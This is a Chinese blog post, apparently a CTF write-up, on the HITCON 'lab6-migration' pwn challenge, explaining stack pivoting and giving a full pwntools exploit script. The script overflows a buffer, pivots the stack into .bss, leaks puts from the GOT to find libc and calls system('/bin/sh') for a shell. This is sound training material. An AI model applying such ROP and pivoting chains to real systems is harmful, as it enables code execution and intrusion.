您的位置: 首页  >  文章  >  Pwn-10月25-Hitcon(三)

Pwn-10月25-Hitcon(三)

分类: 文章 2024-05-18 22:12:40

文章目录

Pwn-10月25-Hitcon(三)

一天一天慢慢来,?

lab6-migration

这个题目涉及到栈迁移(stack-pivot),在ctf-wiki上面是有这个例题和解释的。

该技巧就是劫持栈指针指向攻击者所能控制的内存处,然后再在相应的位置进行 ROP。一般来说,我们可能在以下情况需要使用 stack pivoting

  • 可以控制的栈溢出的字节数较少,难以构造较长的 ROP 链
  • 开启了 PIE 保护,栈地址未知,我们可以将栈劫持到已知的区域。
  • 其它漏洞难以利用,我们需要进行转换,比如说将栈劫持到堆空间,从而在堆上写 rop 及进行堆漏洞利用

此外,利用 stack pivoting 有以下几个要求:

  • 可以控制程序执行流。
  • 可以控制 sp 指针。一般来说,控制栈指针会使用 ROP,常见的控制栈指针的 gadgets 一般是
pop rsp/esp

在这题中,溢出长度不够导致无法一次性构造ropchain,并且还限制了main函数溢出的次数。

检查保护措施

checksec migration

Pwn-10月25-Hitcon(三)

开启了NX。

逻辑分析

ida 里面看一看:

Pwn-10月25-Hitcon(三)

buf大小为0x28 = 40字节,而read读取0x40 = 64字节

gdb跑一下,看看具体情况:

Pwn-10月25-Hitcon(三)

也就是说有4个字节被读取到EBP中,剩下20个溢出字节可以用来构造ropchain。

搜索一下可用的gadget:

Pwn-10月25-Hitcon(三)

构造exp

exp:

#!/usr/bin/python
# -*- coding:utf-8 -*-S
from pwn import *
context.log_level = 'debug'

p = process('./migration')
elf = ELF("./migration")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")

system_libc = libc.symbols["system"]
print "system_libc:"+hex(system_libc)
read_plt = elf.plt["read"]
print "read_plt:"+hex(read_plt)
puts_got = elf.got["puts"]
print "puts_got:"+hex(puts_got)
puts_plt = elf.plt["puts"]
print "puts_plt:"+hex(puts_plt)
puts_libc = libc.symbols["puts"]
print "puts_libc:"+hex(puts_libc)
binsh_libc= libc.search("/bin/sh").next()
print "binsh_libc:"+hex(binsh_libc)

leave_ret = 0x08048418
p3ret = 0x08048569 #pop esi ; pop edi ; pop ebp ; ret
p1ret = 0x0804836d #pop_ebp_ret
buf1 = elf.bss() + 0x500
buf2 = elf.bss() + 0x400

payload = 'a'*40
# buf1 为ebp,eip ==> read_plt ==> leave_ret为返回地址 ==>read(0,buf1,0x100)
payload +=p32(buf1)+p32(read_plt)+p32(leave_ret)+p32(0)+p32(buf1)+p32(0x100)
#leave;ret ==> mov ebp,esp; pop ebp; ret;
p.recvuntil(" :\n")
p.send(payload)
sleep(0.1)

#通过之前的leave_ret,将buf2作为ebp,得到puts_addr,通过libc泄露得到binsh,system_addr
payload=p32(buf2)+p32(puts_plt)+p32(p1ret)+p32(puts_got)+p32(read_plt)+p32(leave_ret)+p32(0)+p32(buf2)+p32(0x100)
p.send(payload)
sleep(0.1)

puts_addr =u32(p.recv(4))
print "puts_addr:"+hex(puts_addr)
offset = puts_addr - puts_libc
system_addr = system_libc + offset
binsh = binsh_libc +offset
'''
payload =p32(buf1)+p32(read_plt)+p32(p3ret)+p32(0)+p32(buf1)+p32(0x100)+p32(system_addr)+p32(0xdeadbeef)+p32(buf1)
p.send(payload)
sleep(0.1)
#p.send("/bin/sh\0")
p.interactive()
'''

#懵逼栈
payload =p32(buf1)+p32(system_addr)+"bbbb"+p32(binsh)
p.send(payload)
sleep(0.1)
p.interactive()

exp运行效果:Pwn-10月25-Hitcon(三)

这题伪造假栈帧,从而构造ropchain,简直就是一场消化盛宴,我需要好好消化一下lab6。

今天还看了一下安恒一周年特别赛的一道pwn题–over,做一半发现只能控制ebp和eip???没想到是安恒杯六月赛的一道原题,在ctf-wiki的花式栈溢出技巧里面有,并且和lab6一样也是通过控制ebp和eip来做,但是那题并没有多出来的溢出字节。

总的来说,两种都可以称作伪造假栈帧:CTF-WIKI-花式栈溢出

相关推荐